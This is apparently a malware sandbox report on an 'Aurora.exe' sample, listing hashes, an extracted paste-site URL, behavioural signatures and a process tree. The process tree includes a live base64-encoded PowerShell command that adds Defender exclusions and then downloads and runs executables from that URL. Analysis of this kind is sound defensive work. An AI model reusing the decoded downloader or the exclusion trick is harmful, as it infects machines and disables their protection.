Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
22/01/2025, 13:47
250122-q32g8sypgs 1022/01/2025, 13:44
250122-q192layngz 1022/01/2025, 13:13
250122-qf259axpht 1017/01/2025, 17:31
250117-v3wn7sylcm 10Analysis
-
max time kernel
40s -
max time network
158s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22/01/2025, 13:47
Behavioral task
behavioral1
Sample
Aurora.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Aurora.exe
Resource
win10v2004-20241007-en
General
-
Target
Aurora.exe
-
Size
25.5MB
-
MD5
ee0a49caa656fe8693ffec78e69e864d
-
SHA1
dca409540b8c19a31e0748a17425835358a90e1b
-
SHA256
34e038a53f367feda9eb1ffbf71ca6af8ac9ace7a34d86c43e1f197c8988057f
-
SHA512
897be9ce27bec144b34cdfc4ef94cd95c2cb58a50e4679f9c3a2fa2df42c0a9dea80b4fcb7fb4fd037278cab427abaaae553e1939bff83868e15fffd3fdf3aa1
-
SSDEEP
98304:SlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxz:OQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRO
Malware Config
Extracted
https://rentry.org/xau9i/raw
Signatures
-
Aurora family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2580 powershell.exe 6 2580 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2700 LX.exe -
Loads dropped DLL 1 IoCs
pid Process 2760 Aurora.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Aurora.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 2544 powershell.exe 1124 chrome.exe 1124 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe Token: SeShutdownPrivilege 1124 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe 1124 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2760 wrote to memory of 2700 2760 Aurora.exe 31 PID 2760 wrote to memory of 2700 2760 Aurora.exe 31 PID 2760 wrote to memory of 2700 2760 Aurora.exe 31 PID 2760 wrote to memory of 2700 2760 Aurora.exe 31 PID 2700 wrote to memory of 2580 2700 LX.exe 32 PID 2700 wrote to memory of 2580 2700 LX.exe 32 PID 2700 wrote to memory of 2580 2700 LX.exe 32 PID 2580 wrote to memory of 2544 2580 powershell.exe 34 PID 2580 wrote to memory of 2544 2580 powershell.exe 34 PID 2580 wrote to memory of 2544 2580 powershell.exe 34 PID 1124 wrote to memory of 1844 1124 chrome.exe 37 PID 1124 wrote to memory of 1844 1124 chrome.exe 37 PID 1124 wrote to memory of 1844 1124 chrome.exe 37 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 672 1124 chrome.exe 39 PID 1124 wrote to memory of 472 1124 chrome.exe 40 PID 1124 wrote to memory of 472 1124 chrome.exe 40 PID 1124 wrote to memory of 472 1124 chrome.exe 40 PID 1124 wrote to memory of 2872 1124 chrome.exe 41 PID 1124 wrote to memory of 2872 1124 chrome.exe 41 PID 1124 wrote to memory of 2872 1124 chrome.exe 41 PID 1124 wrote to memory of 2872 1124 chrome.exe 41 PID 1124 wrote to memory of 2872 1124 chrome.exe 41 PID 1124 wrote to memory of 2872 1124 chrome.exe 41 PID 1124 wrote to memory of 2872 1124 chrome.exe 41 PID 1124 wrote to memory of 2872 1124 chrome.exe 41 PID 1124 wrote to memory of 2872 1124 chrome.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aurora.exe"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Users\Admin\AppData\Local\Temp\LX.exe"C:\Users\Admin\AppData\Local\Temp\LX.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAZgBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAbQBtACMAPgA7ACIAOwA8ACMAcwBxAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAGcAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB0AGgAZwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAHgAYQAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AeABhAHUAOQBpAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBqAHoAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAbgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAdQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBtAGIAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAGgAaQBsACMAPgA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#cfg#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#pmm#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef76d9758,0x7fef76d9768,0x7fef76d97782⤵PID:1844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1088 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:22⤵PID:672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:82⤵PID:472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:82⤵PID:2872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2300 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:1688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2324 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:2188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2632 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:22⤵PID:316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2864 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:1904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:82⤵PID:1000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3936 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:1536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3116 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:2656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3104 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:2976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3860 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:2612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3952 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:2860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=652 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:2076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3632 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:2220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2788 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:12⤵PID:2132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=1376,i,8329028241517561187,10203618667479472836,131072 /prefetch:82⤵PID:344
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2480
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD555540a230bdab55187a841cfe1aa1545
SHA1363e4734f757bdeb89868efe94907774a327695e
SHA256d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb
SHA512c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
Filesize230B
MD5d2ea0c3637c4c39889c8e0846cc1e945
SHA1fb14210c26d08f340b50bf554a89bc9d83c60697
SHA2560848355dac3f31e235d5ee111f8dbbde13e7ee0325e04daa541a1ae9d01d9687
SHA512d98a6b4df39587d22a92969460fb83ac1cf6d43003a43ffea5774e4fcf36d43d82d58c85ab13b029e82afeedf9744a35ba971b33d0cbc1faaef3b2c0ee51c7dc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD579615943f9083c1fd0c29b559837e02c
SHA1ba662e523fe72fa10ca45a6277b3d3a57f556920
SHA256f0f70aab38f0cf4a939440c6d547668ba5bf60c44225c1b79620bec411ab6ff2
SHA5127be1e1fff3193cf2017decfbcbd276b15bf3200c8ba77d2ca5f085eb11140b18413b734d41d96e0816c77f0ac7de3931f6d72cf54af84c884493edf914c580ee
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5d2d58ff6050434be218114088ff064f5
SHA1aaff24e1fb87192ff7d4cd2531e8d002b9ad136e
SHA2566b8f3a2bd60527d149eedb01d04f981018b32dd86c63f803bc4b4427aecf27fd
SHA512fbb1343a803407893f55b104e1d028536355f6d1483be0bcc3cc943f09e6452acd4a2835a243561ff9a09075319cb744890ece449003aa930a518d34c594a3b2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c1269392e4d0ea713d0d1802cff7bfa9
SHA15f9c2d94046e3583d4749c56e554c4fc017b1bf3
SHA256b78ac918662bb7184b657a8b151a82dce39fcc07d70fcaa6da97166f3aca7b3b
SHA512db2ddd2f31e16f0eb8316df73029caed0b57b3628e55d5ecc5bc40f33d0623d964409ec9bd14ac86af960c8373c1681c30738beac5dac03251f13fc15ddfb48f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD550870167970836873fb4a028e99bb40b
SHA1557ffde4e6ad18591f336f396e14f6661b62501a
SHA256d01f69b0192609c372e69566fa2a428367669e5bcf377fe4697c1c80f0ebdcd3
SHA5129d02497a5d310944222612de9e997ac8d2b12926c0314e0530e2d9b7a7e1fdc6c2090fda3dc6b6438c5c088b328e2b0dad64a5d3054c7c7b25beca6b78b102bb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58b8898448aaf1ef339982092ee1abb96
SHA108485afc5016cb4f5d7627d425b070c52842030f
SHA256fae627775764506b443cb96a0cb7b7a2873f6a26b16f2c90796b71f334c8665b
SHA5121b143f393bc0b2b1ad8fc0f5ec6df544706f9d4885f12078233a1790a899cf32e171e8fe40d7ad241eeb335a74171a895be796fabc8cb20a57d3e921836aeee2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5ef425943af4540a5a79f8323fbda4dca
SHA1a924be1dc56a993d42fea80bbdce39f0a9ef1b63
SHA256e1996827412046eff91f363ff8713fd3998fb99d720c26856634b8c108f6f5a8
SHA5120e28800df2d62a5f4d7818b9a35c20e5a6a3533db118b378d88cf5a62033ceffa7224319142cef7e54917fc0b98ccddf28e33321e4538b09bc82996e9b12275a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD573d81bd5193585ff83062d23daf119a8
SHA14d68cbb6f67448950ccd178f9b9555212cf1825d
SHA2560dcb4dd9f92f9fb936a975168f21a96094cfdd246a7c461b18f72a00853ca790
SHA512b16c1ea8a9c0250bc94b76e79aeb6a0f4c9c4dbf3798bff92b919e23043355775e3200041369140fa99acb810cb8bf3617627bdea7e113f6ae32ba8fb4bf6c29
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5baaa3c59e9fd59c171ac892d9200c0bb
SHA1d68b050a164773a45fed09534ce23573a8e6ced8
SHA256c85c490d0135f4a0a8f3c15453a2ed57c43a42cb9431ff25461326b5d2e5e49e
SHA51206406f2b0a45fe2f4c09ae73329515f890fba712c751de3996232c9f55f37631682a9646370ef443ad1d0c60460e6c00e0b4ce01e6c29e1d7e8eb4c42d529b4e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
